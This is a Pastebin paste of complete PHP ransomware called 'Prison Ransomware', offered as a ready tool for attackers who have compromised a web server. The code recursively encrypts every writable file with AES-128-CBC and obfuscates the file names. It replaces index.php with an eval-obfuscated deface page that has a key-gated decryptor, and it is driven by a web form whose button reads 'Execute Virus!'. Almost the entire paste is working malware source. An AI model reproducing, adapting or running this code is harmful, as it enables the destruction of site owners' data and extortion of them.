willysec_id

Prison Ransomware

Jun 24th, 2024
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 25.29 KB | Cybersecurity | 0 0
  1. <?php
  2. //* ##############################################################
  3. //*     PRISON RANSOMWARE CODED BY ./Err0r_HB
  4. //*     Author : ./Err0r_HB
  5. //*     Github : https://github.com/Err0r-ICA
  6. //*     Contact : errorhb@protonmail.com
  7. //*     Greetz : All Defacers && Cyb3r Drag0nz / ByteBlitz
  8. //* ##############################################################
  9.  
  10. $filename = basename($_SERVER["PHP_SELF"]);
  11. set_time_limit(0);
  12. ini_set("memory_limit", "-1");
  13. error_reporting(0);
  14.  
  15. // use dot(.) for extensions. you can change it anything you want :)
  16. $encrypt_eks = ".Err0r1337";
  17.  
  18. // skipping encrypt this file! use | for delimiter .
  19. $blacklist = "$filename|index.php|index.html|Cyb3r.php|rans.php|wzo.php|Cyb3r.html|.htaccess|.git|node_modules";
  20.  
  21. class Encrypt
  22. {
  23.     private $encrypt_eks;
  24.     private $blacklist;
  25.     private $write_BlackList;
  26.  
  27.     public function __construct($encrypt_eks, $blacklist)
  28.     {
  29.         $this->encrypt_eks = $encrypt_eks;
  30.         $this->blacklist = explode("|", $blacklist);
  31.         $this->write_BlackList = $blacklist;
  32.  
  33.         if (file_exists($this->locate() . "/index.php")) {
  34.             if (!is_writable($this->locate() . "/index.php")) {
  35.                 echo "<font color = 'red'>Can't run the ransom { index.php is not writeable! remove it manually or change the permissions! }</font>";
  36.                 exit();
  37.             }
  38.         }
  39.     }
  40.  
  41.     private function flush()
  42.     {
  43.         flush();
  44.         ob_flush();
  45.     }
  46.  
  47.     private function kecuali($ext, $name)
  48.     {
  49.         for ($i = 0; $i < count($name); $i++) {
  50.             $re = "/({$name[$i]})/";
  51.             preg_match($re, $ext, $matches);
  52.             if ($matches[1]) {
  53.                 return false;
  54.             }
  55.         }
  56.         return true;
  57.     }
  58.  
  59.     public function locate()
  60.     {
  61.         return getcwd();
  62.     }
  63.  
  64.     public function encrypt_index()
  65.     {
  66.         $get = file_get_contents($this->locate() . "/index.php");
  67.         $convert = base64_encode(
  68.             gzdeflate(
  69.                 str_rot13(
  70.                     rawurlencode(
  71.                         gzdeflate(
  72.                             convert_uuencode(
  73.                                 base64_encode(
  74.                                     str_rot13(
  75.                                         gzdeflate(
  76.                                             convert_uuencode(
  77.                                                 rawurldecode(str_rot13($get))
  78.                                             )
  79.                                         )
  80.                                     )
  81.                                 )
  82.                             )
  83.                         )
  84.                     )
  85.                 )
  86.             )
  87.         );
  88.         $fp = fopen("index.php", "w");
  89.         $open = [
  90.             "<?php",
  91.             '$index=',
  92.             "'",
  93.             $convert,
  94.             "';",
  95.             'eval(str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($index)))))))))))));',
  96.         ];
  97.  
  98.         if (fwrite($fp, implode("\n\r", $open))) {
  99.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Encrypting The Index Files Success!</font>) <br>';
  100.         }
  101.  
  102.         fclose($fp);
  103.     }
  104.  
  105.     private function renameExt($locate, $dir, $d)
  106.     {
  107.         $encrypt = base64_encode(str_rot13(gzdeflate(str_rot13($d))));
  108.         $new_file = $dir . DIRECTORY_SEPARATOR . $encrypt;
  109.  
  110.         if (is_writable($locate)) {
  111.             if (rename($locate, $new_file . $this->encrypt_eks)) {
  112.                 echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' .
  113.                     $locate .
  114.                     "</font> <br>";
  115.             } else {
  116.                 echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="red">Failed! Do not know what happened :(</font>) <font color="#FF9800">|</font> ' .
  117.                     $locate .
  118.                     " <br>";
  119.             }
  120.         } else {
  121.             echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font> ' .
  122.                 $locate .
  123.                 " <br>";
  124.         }
  125.     }
  126.  
  127.     public function cekDirectory($dir, $method, $key)
  128.     {
  129.         foreach (scandir($dir) as $d) {
  130.             if ($d != "." && $d != "..") {
  131.                 $locate = $dir . DIRECTORY_SEPARATOR . $d;
  132.                 if ($this->kecuali($locate, $this->blacklist)) {
  133.                     if (is_writable($locate)) {
  134.                         if (!is_dir($locate)) {
  135.                             $this->spreadRansom($key, $locate, $method);
  136.                             $this->renameExt($locate, $dir, $d);
  137.                         } else {
  138.                             $this->cekDirectory($locate, $method, $key);
  139.                         }
  140.                     } else {
  141.                         if (!is_dir($locate)) {
  142.                             echo '<font color="#00BCD4">File ' .
  143.                                 $locate .
  144.                                 '  </font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font><br>';
  145.                         } else {
  146.                             echo '<font color="#00BCD4">Directory ' .
  147.                                 $locate .
  148.                                 '  </font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font><br>';
  149.                         }
  150.                         $this->cekDirectory($locate, $method, $key);
  151.                     }
  152.                 }
  153.             }
  154.             $this->flush();
  155.         }
  156.     }
  157.  
  158.     public function DefaceIt($method, $key, $deface)
  159.     {
  160.         $secret_key = password_hash($key, PASSWORD_DEFAULT);
  161.         if (file_exists("index.php")) {
  162.             if (is_writable("index.php")) {
  163.                 rename("index.php", "index.php" . $this->encrypt_eks);
  164.             } else {
  165.                 echo '<font color="#00BCD4">Index.php </font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>)';
  166.             }
  167.         }
  168.  
  169.         $fp = fopen("index.php", "a+");
  170.         $open = [
  171.             //'<?php',
  172.             "// Can You Crack My Strongest Key ? HAHAHA",
  173.             "",
  174.         ];
  175.         $arr = ['$secret_key=', "'", $secret_key, "';"];
  176.         $list = ['$blacklist=', "'", $this->write_BlackList, "';"];
  177.         fwrite($fp, implode("\n\r", $open));
  178.         fwrite($fp, implode("", $arr));
  179.         fwrite($fp, implode("", $list));
  180.         $header =
  181.             "Ly8qICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCi8vKgkJUkFOU09NV0FSRSBDT0RFRCBCWSAuL0VycjByX0hCICAgCQovLwkJQ29udGFjdDogZXJyb3JfaGJAcHJvdG9ubWFpbC5jb20KLy8qCQlHcmVldHogOiBBbGwgRGVmYWNlcnMgJiYgQXp6YXNlYwovLyogIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCnNldF90aW1lX2xpbWl0KDApOwppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnLTEnKTsKZXJyb3JfcmVwb3J0aW5nKDApOwoKY2xhc3MgRGVjcnlwdAp7CiAgICBwcml2YXRlICRibGFja2xpc3Q7CgogICAgIHB1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkYmxhY2tsaXN0KQogICAgewogICAgICAgICR0aGlzLT5ibGFja2xpc3QgPSBleHBsb2RlKCJ8IiwkYmxhY2tsaXN0KTsKICAgIH0KCiAgICBwdWJsaWMgZnVuY3Rpb24ga2VjdWFsaSgkZXh0LCAkbmFtZSkKICAgIHsKICAgICAgICBmb3IoJGkgPSAwIDsgJGkgPCBjb3VudCgkbmFtZSk7ICRpKyspewogICAgICAgICAgICAkcmUgPSAiLyh7JG5hbWVbJGldfSkvIjsKICAgICAgICAgICAgcHJlZ19tYXRjaCgkcmUsICRleHQsICRtYXRjaGVzKTsKICAgICAgICAgICAgaWYgKCRtYXRjaGVzWzFdKSB7CiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgcmV0dXJuIHRydWU7CiAgICB9CgogICAgcHVibGljIGZ1bmN0aW9uIGxvY2F0ZSgpCiAgICB7CiAgICAgICAgcmV0dXJuIGdldGN3ZCgpOwogICAgfQoKICAgIHB1YmxpYyBmdW5jdGlvbiBmbHVzaCgpCiAgICB7CiAgICAgICAgZmx1c2goKTsKICAgICAgICBvYl9mbHVzaCgpOwogICAgfQ==";
  182.         $header2 = [
  183.             'public function cekDirectory($dir, $key)
  184.            {
  185.                foreach (scandir($dir) as $d) {
  186.                    if ($d != "." && $d != "..") {
  187.                        $locate = $dir . DIRECTORY_SEPARATOR . $d;
  188.                        if ($this->kecuali($locate, $this->blacklist)) {
  189.                        if(is_writable($locate)){
  190.                            if (!is_dir($locate)) {
  191.                                $this->DecryptRansom($key, $locate);
  192.                                $this->renameExt($locate, $dir, $d);
  193.                            }
  194.                         else {
  195.                            $this->cekDirectory($locate, $key);
  196.                          }
  197.                        } else{
  198.                            if(!is_dir($locate)){
  199.                                echo `<font color="#00BCD4">File $locate</font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font><br>`;
  200.                            } else{
  201.                                echo `<font color="#00BCD4">Directory $locate</font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font><br>`;
  202.                            }
  203.                        }  
  204.                        
  205.                      }
  206.                    }
  207.                    $this->flush();
  208.                }
  209.            }',
  210.             'public function removeDeface()
  211.            {
  212.                if(file_exists("index.php")){
  213.                    if(is_writable("index.php")){
  214.                            unlink("index.php");
  215.                            echo `<font color="#00BCD4">index.php removed</font> (<font color="#40CE08">ransom page successfuly decrypted</font>) <br>`;
  216.                    } else{
  217.                        echo `<font color="#00BCD4">index.php removed</font> (<font color="#40CE08">ransom page successfuly decrypted</font>) <br>`;
  218.                    }
  219.                } else{
  220.                
  221.                }
  222.        
  223.                if(file_exists("index.php' .
  224.             $this->encrypt_eks .
  225.             '"))
  226.                        {
  227.                           if(is_writable("index.php' .
  228.             $this->encrypt_eks .
  229.             '")){
  230.                               if(rename("index.php' .
  231.             $this->encrypt_eks .
  232.             '","index.php")){
  233.                                echo `<font color="#00BCD4">index.php' .
  234.             $this->encrypt_eks .
  235.             '</font> (<font color="#40CE08">successfully recovered!</font>) <br>`;
  236.                               }
  237.                          
  238.                           }
  239.                       }
  240.        
  241.            }',
  242.         ];
  243.         switch ($method) {
  244.             case "1":
  245.                 $ransom_decrypt =
  246.                     "JGl2ID0gc3Vic3RyKCRkYXRhLCAwLCBtY3J5cHRfZ2V0X2l2X3NpemUoTUNSWVBUX1JJSk5EQUVMXzEyOCwgTUNSWVBUX01PREVfQ0JDKSk7DQogICAgICAgICRkZWNyeXB0ZWQgPSBydHJpbSgNCiAgICAgICAgICAgIG1jcnlwdF9kZWNyeXB0KA0KICAgICAgICAgICAgICAgIE1DUllQVF9SSUpOREFFTF8xMjgsDQogICAgICAgICAgICAgICAgaGFzaCgnc2hhMjU2JywgJGtleSwgdHJ1ZSksDQogICAgICAgICAgICAgICAgc3Vic3RyKCRkYXRhLCBtY3J5cHRfZ2V0X2l2X3NpemUoTUNSWVBUX1JJSk5EQUVMXzEyOCwgTUNSWVBUX01PREVfQ0JDKSksDQogICAgICAgICAgICAgICAgTUNSWVBUX01PREVfQ0JDLA0KICAgICAgICAgICAgICAgICRpdg0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgICJcMCINCiAgICAgICAgKTs=";
  247.                 break;
  248.             case "2":
  249.                 $ransom_decrypt =
  250.                     "ICRpdmxlbiA9IG9wZW5zc2xfY2lwaGVyX2l2X2xlbmd0aCgkY2lwaGVyID0gIkFFUy0xMjgtQ0JDIik7DQogICAgICAgICAgICAgICAgJGl2ID0gc3Vic3RyKCRkYXRhLCAwLCAkaXZsZW4pOw0KICAgICAgICAgICAgICAgIHN1YnN0cigkZGF0YSwgJGl2bGVuLCAkc2hhMmxlbiA9IDMyKTsNCiAgICAgICAgICAgICAgICAkY2lwaGVydGV4dF9yYXcgPSBzdWJzdHIoJGRhdGEsICRpdmxlbiArICRzaGEybGVuKTsNCiAgICAgICAgICAgICAgICAkZGVjcnlwdGVkID0gcnRyaW0ob3BlbnNzbF9kZWNyeXB0KCRjaXBoZXJ0ZXh0X3JhdywgJGNpcGhlciwgJGtleSwgT1BFTlNTTF9SQVdfREFUQSwgJGl2KSwgIlwwIik7";
  251.                 break;
  252.         }
  253.         $footer =
  254.             "aWYoaXNfd3JpdGFibGUoJGxvY2F0ZSkpewogICAgaWYgKGZpbGVfcHV0X2NvbnRlbnRzKCRsb2NhdGUsICAkZGVjcnlwdGVkKSkgewogICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iIzAwQkNENCI+UmFuc29td2FyZSBEZWNyeXB0Li4uIDwvZm9udD4gKDxmb250IGNvbG9yPSIjNDBDRTA4Ij5TdWNjZXNzPC9mb250PikgPGZvbnQgY29sb3I9IiNGRjk4MDAiPnw8L2ZvbnQ+IDxmb250IGNvbG9yPSIjMjE5NkYzIj4nIC4gJGxvY2F0ZSAuICc8L2ZvbnQ+IDxicj4nOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSIjMDBCQ0Q0Ij5SYW5zb213YXJlIEZhaWxlZCB0byBEZWNyeXB0PC9mb250PiAoPGZvbnQgY29sb3I9InJlZCI+UG9zc2libGUgZGF0YSBjb3JydXB0ITwvZm9udD4pIDxmb250IGNvbG9yPSIjRkY5ODAwIj58PC9mb250PiA8Zm9udCBjb2xvcj0iIzIxOTZGMyI+JyAuICRsb2NhdGUgLiAnPC9mb250PiA8YnI+JzsKICAgICAgICB9Cn0gZWxzZXsKICAgIGVjaG8gJzxmb250IGNvbG9yPSIjMDBCQ0Q0Ij5SYW5zb213YXJlIEZhaWxlZCB0byBEZWNyeXB0PC9mb250PiAoPGZvbnQgY29sb3I9InJlZCI+RmlsZSBub3Qgd3JpdGVhYmxlISBQZXJtaXNzaW9uIERlbmllZCEgT3IgTm90IEVuY3J5cHRlZCBCZWZvcmU/IFNhZmUgQWN0aW9uLi4uIFNraXBwaW5nLi4uIDwvZm9udD4pIDxmb250IGNvbG9yPSIjRkY5ODAwIj58PC9mb250PiA8Zm9udCBjb2xvcj0iIzIxOTZGMyI+JyAuICRsb2NhdGUgLiAnPC9mb250PiA8YnI+JzsKfQoKICAgIH0KfQoKJGluaXQgPSBuZXcgRGVjcnlwdCgkYmxhY2tsaXN0KTsKCmlmIChpc3NldCgkX1BPU1RbJ3N1Ym1pdCddKSkgewogICAgJGtleSA9IHRyaW0oJF9QT1NUWydrZXknXSk7CiAgICBpZiAoJGtleSkgewogICAgICAgIC8vIERvbid0IHJlbW92ZSB0aGUgcGFzc3dvcmRfdmVyaWZ5IGZ1bmN0aW9uICEgCiAgICAgICAgaWYgKHBhc3N3b3JkX3ZlcmlmeSgka2V5LCAkc2VjcmV0X2tleSkpIHsKICAgICAgICAgICAgZWNobyAiPHNjcmlwdD5hbGVydCgnQ29uZ3JhdHMhIENvcnJlY3QgRGVjcnlwdGlvbiBLZXkhJyk8L3NjcmlwdD4iOwogICAgICAgICAgICAkaW5pdC0+Y2VrRGlyZWN0b3J5KCRpbml0LT5sb2NhdGUoKSwgJGtleSk7CiAgICAgICAgICAgICRpbml0LT5yZW1vdmVEZWZhY2UoKTsKICAgICAgICB9IGVsc2V7CiAgICAgICAgICAgIGVjaG8gIjxzY3JpcHQ+YWxlcnQoJ1dob29wei4gV3JvbmcgUGFzc3dvcmQuIFRha2UgYSBkZWVwIGJyZWF0aGUgYW5kIHRyeSBhZ2FpbiEnKTwvc2NyaXB0PiI7CiAgICAgICAgfQogICAgfSBlbHNlewogICAgICAgIGVjaG8gIjxzY3JpcHQ+YWxlcnQoJ0tleSBjYW5ub3QgYmUgZW1wdHkhJyk8L3NjcmlwdD4iOwogICAgfQp9Cgo/Pg==";
  255.         $decryptor = [
  256.             ' public function renameExt($locate, $dir, $d)
  257.            {
  258.                $locates = str_replace("' .
  259.             $this->encrypt_eks .
  260.             '", "", $d);
  261.                $locates = str_rot13(gzinflate(str_rot13(base64_decode($locates))));
  262.                $new_file = $dir . DIRECTORY_SEPARATOR . $locates;
  263.                if(is_writable($locate)){
  264.                    if(rename($locate,$new_file))
  265.                    {
  266.                        echo `<font color="#00BCD4">Decrypt Name File</font> (<font color="#49D2SNGzC9GHcrUUaqinbv3Z2PLFKvxxmFNNsY6aQG72DmWbGET77srS3bd7S1wwYLTnyPqURASpx15UMac6uZKxFzSmgvJ>`;
  267.                    }else{
  268.                        echo `<font color="#00BCD4">Decrypt Name File</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font>$locate<br>`;
  269.                    }
  270.                } else{
  271.                    echo `<font color="#00BCD4">Decrypt Name File...</font> (<font color="red">File not writeable! Permission Denied! Or Not Encrypted Before? Safe Action... Skipping... </font>) <font color="#FF9800">|</font>$locate<br>`;
  272.                }
  273.                
  274.            }',
  275.             'public function DecryptRansom($key, $locate)
  276.                {',
  277.             ' $data = base64_decode(file_get_contents($locate));',
  278.             base64_decode($ransom_decrypt),
  279.             base64_decode($footer),
  280.         ];
  281.  
  282.         if (fwrite($fp, base64_decode($header))) {
  283.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Header Decryptor Success!</font>) <br>';
  284.         }
  285.         if (fwrite($fp, implode("\n\r", $header2))) {
  286.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Header Decryptor 2 Success!</font>) <br>';
  287.         }
  288.  
  289.         if (fwrite($fp, implode("\n\r", $decryptor))) {
  290.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Core Decryptor Success!</font>) <br>';
  291.         }
  292.  
  293.         if (fwrite($fp, $deface)) {
  294.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Deface Page Success!</font>) <br>';
  295.         }
  296.         fclose($fp);
  297.     }
  298.  
  299.     private function spreadRansom($key, $locate, $method)
  300.     {
  301.         $data = chmod($locate, 0777);
  302.         $data = file_get_contents($locate);
  303.         switch ($method) {
  304.             case "1":
  305.                 $iv = mcrypt_create_iv(
  306.                     mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
  307.                     MCRYPT_DEV_URANDOM
  308.                 );
  309.                 $encrypted = base64_encode(
  310.                     $iv .
  311.                         mcrypt_encrypt(
  312.                             MCRYPT_RIJNDAEL_128,
  313.                             hash("sha256", $key, true),
  314.                             $data,
  315.                             MCRYPT_MODE_CBC,
  316.                             $iv
  317.                         )
  318.                 );
  319.                 break;
  320.             case "2":
  321.                 $ivlen = openssl_cipher_iv_length($cipher = "AES-128-CBC");
  322.                 $iv = openssl_random_pseudo_bytes($ivlen);
  323.                 $ciphertext_raw = openssl_encrypt(
  324.                     $data,
  325.                     $cipher,
  326.                     $key,
  327.                     OPENSSL_RAW_DATA,
  328.                     $iv
  329.                 );
  330.                 $hmac = hash_hmac("sha256", $ciphertext_raw, $key, true);
  331.                 $encrypted = base64_encode($iv . $hmac . $ciphertext_raw);
  332.                 break;
  333.         }
  334.         if (is_writable($locate)) {
  335.             if (file_put_contents($locate, $encrypted)) {
  336.                 echo '<font color="#00BCD4">AES-128-CBC Ransom...</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' .
  337.                     $locate .
  338.                     "</font> <br>";
  339.             } else {
  340.                 echo '<font color="#00BCD4">AES-128-CBC Ransom...</font> (<font color="red">Failed! Do not know what happen :(</font>) <font color="#FF9800">|</font> ' .
  341.                     $locate .
  342.                     " <br>";
  343.             }
  344.         } else {
  345.             echo '<font color="#00BCD4">AES-128-CBCRansom...</font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font> ' .
  346.                 $locate .
  347.                 " <br>";
  348.         }
  349.     }
  350. }
  351. $init = new Encrypt($encrypt_eks, $blacklist);
  352.  
  353. if (isset($_POST["submit"])) {
  354.     $deface = trim($_POST["deface"]);
  355.     $key = trim($_POST["key"]);
  356.     $method = trim($_POST["method"]);
  357.     if ($key) {
  358.         if ($deface) {
  359.             switch ($method) {
  360.                 case "1":
  361.                     if (version_compare(PHP_VERSION, "7.2.0", ">")) {
  362.                         echo "<br><br><font color = red>Ransomware Mcrypt Only Support in PHP 5 . Use Ransomware OpenSSL instead of Ransomware Mcrypt </font> ";
  363.                     }
  364.                     break;
  365.             }
  366.             $init->cekDirectory($init->locate(), $method, $key);
  367.             $init->DefaceIt($method, $key, $deface);
  368.             $init->encrypt_index();
  369.         }
  370.     }
  371. }
  372. ?>
  373.  
  374. <html>
  375.  
  376. <head>
  377.     <link rel="icon" type="image/gif" href="https://i.postimg.cc/fWPTKQ6s/Picsart-24-03-16-05-04-18-637.png">
  378.     <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  379.     <title> &#1203;&#824;&#1202;&#824;&#1203; ./Err0r_HB Prison Ransomware &#1203;&#824;&#1202;&#824;&#1203;</title>
  380.     <style type="text/css">
  381.         body {
  382.             background: black;
  383.  
  384.             color: #e2e2e2;
  385.         }
  386.  
  387.         .selecte {
  388.             border-color: lime;
  389.             width: 300px;
  390.             height: 30px;
  391.             background-color: transparent;
  392.             color: lime;
  393.         }
  394.  
  395.         .inpute {
  396.             width: 500px;
  397.             height: 20px;
  398.             border-color: #EA2A14;
  399.             background-color: transparent;
  400.             color: lime;
  401.             text-align: center;
  402.         }
  403.  
  404.         .submite {
  405.             width: 200px;
  406.             border-color: red;
  407.             background-color: transparent;
  408.             color: red;
  409.         }
  410.  
  411.         textarea {
  412.             border-color: #EA2A14;
  413.             width: 100%;
  414.             height: 400px;
  415.             padding-left: 5px;
  416.             margin: 10px auto;
  417.             resize: none;
  418.             background: transparent;
  419.             color: #ffffff;
  420.             font-size: 13px;
  421.         }
  422.     </style>
  423. </head>
  424.  
  425. <body>
  426.     <center>
  427.         <pre>
  428. <font color = "lime">
  429. ____________
  430. ║▒▒▒▒▒▒▒▒▒▒║
  431. ║▒▒▒▒▒▒▒▒▒▒║
  432.  ║▒▒▒▒▒▒▒▒▒▒║  
  433. <font color = "#008000">╔════════════╗
  434. ╚════════════╝
  435.  <font color = "#ff1493">║<font color = "#FFFFFF">██████████<font color = "#ff1493">╚╗
  436. <font color = "#ff1493"> ║<font color = "#FFFFFF">██<font color = "#ff1493">╔══╗<font color = "#FFFFFF">█<font color = "#ff1493">╔═╗<font color = "#FFFFFF">█<font color = "#ff1493">║
  437.  <font color = "#ff1493">║<font color = "#FFFFFF">██<font color = "#ff1493">║<font color = "#20b2aa">╬<font color = "#ff1493">╔╝<font color = "#FFFFFF">█<font color = "#ff1493">╚╗║<font color = "#FFFFFF">█<font color = "#ff1493">║
  438.     <font color = "#ff1493">    ║<font color = "#FFFFFF">██<font color = "#ff1493">╚═╝<font color = "#FFFFFF">█<font color = "#ff1493">║<font color = "#FFFFFF">█<font color = "#ff1493">╚╝<font color = "#FFFFFF">█<font color = "#ff1493">║<font color = "lime"> PRISON
  439.           <font color = "#ff1493">  ╚╗<font color = "#FFFFFF">█████████<font color = "#ff1493">═╝<font color = "lime"> RANSOMWARE
  440.             <font color = "#ff1493">       ╚╗║╠╩╩╩╩╩╝<font color = "lime">   *ZzZZzZzzZzZzzZ*
  441.            <font color = "#ff1493">║║╚╗┈<font color = "#ffa07a">█<font color = "#FFFFFF">▐█████<font color = "">▒<font color = "#C0C0C0">.。oO
  442. <font color = "#ff1493">║<font color = "#FFFFFF">██<font color = "#ff1493">╠╦╦╦╗
  443.                  <font color = "#ff1493">   ╚╗<font color = "#FFFFFF">██████<font color = "lime"> Author : *Err0r_HB*
  444.                                    <font color = "#ff1493"> ╚════╝  <font color = "lime">Team : Cyb3r Drag0nz / ByteBlitz  
  445.                
  446. <font color = "#20b2aa"><══════════════════════════════════>
  447.      
  448. <font color = "lime"> -[ Contact : errorhb@protonmail.com ]- <font color = "Cyan"><br>
  449.  
  450.  System :  <br><?php echo php_uname() . "\n"; ?>
  451.  <br>
  452.  <font color = "#FFD700">#Ransomware is placed in [Dir]: <font color = "lime">
  453.  <?php echo getcwd(); ?>/<?php echo basename($_SERVER["PHP_SELF"]) . "\n"; ?>
  454.  <br>
  455.  <font color = "#FFD700">#Ransomware Executing in [Dir]: <font color = "lime">
  456.  <?php echo getcwd(); ?>
  457.  <br>
  458. <font color = "#FFD700"> Note: <br> Recommended Use Ransom OpenSSL for Support All PHP Version<br>
  459.         Ransom Mcrypt Only Support PHP 5 , DEPRECATED in PHP 7.1.0 and REMOVED in PHP 7.2.0 <br>
  460. *Important : File Will not Be Encrypted (Check Blacklist Variable) :<br>    <?php echo $blacklist; ?>
  461.  </font>   
  462. </pre>
  463.  
  464.         <h2>
  465.             <font color='red' face='iceland'> Put Your Uncrackable Key Here Skidz
  466.         </h2>
  467.         </font>
  468.  
  469.         <form action="" method="post" style=" text-align: center;">
  470.             <?= $data =
  471.                 isset($_POST["key"]) && !$_POST["key"]
  472.                     ? "Key cannot be empty"
  473.                     : "" ?>
  474.             <br><br>
  475.             <input type="text" name="key" class="inpute" placeholder="ENCRYPTION KEY" autocomplete="off" value="<?= $v = isset(
  476.                 $_POST["key"]
  477.             )
  478.                 ? $_POST["key"]
  479.                 : "" ?>"><br><br>
  480.             <h2>
  481.                 <font color="red" face="iceland">Deface Page</font>
  482.             </h2>
  483.             <?= $data =
  484.                 isset($_POST["deface"]) && !$_POST["deface"]
  485.                     ? "Deface Page cannot be empty"
  486.                     : "" ?>
  487.             <br><br>
  488.             <textarea style='width: 450px; height: 150px;' name="deface"><?= $dipes = isset(
  489.                 $_POST["deface"]
  490.             )
  491.                 ? $_POST["deface"]
  492.                 : "" ?></textarea>
  493.             </font>
  494.             <h2>
  495.                 <font color='lime' face='iceland'>
  496.  
  497.                     <font size="4">
  498.  
  499.                     </font>PHP_VERSION : <?= phpversion() ?><br><br>
  500.                     Post Method:
  501.                 </font><br>
  502.  
  503.             </h2>
  504.             <select name="method" class="selecte">
  505.                 <option value="1">Ransom Mcrypt</option>
  506.                 <option value="2">Ransom OpenSSL</option>
  507.             </select><br><br><br><br>
  508.             <input type="submit" name="submit" class="submite" value="Execute Virus!" />
  509.         </form>
  510.     </center>
  511. </body><center>
  512. <img src="https://i.postimg.cc/fWPTKQ6s/Picsart-24-03-16-05-04-18-637.png" alt="Logo" width="500" height="500"></center>
  513. </html>
  514. <br>
  515. <!-- do not remove this! after post method, if you refresh the page so it will
  516.    not loop the encrypt function that cause data corrupt! ---->
  517. <script>
  518.     if (window.history.replaceState) {
  519.         window.history.replaceState(null, null, window.location.href);
  520.     }
  521. </script>
Add Comment
Please, Sign In to add comment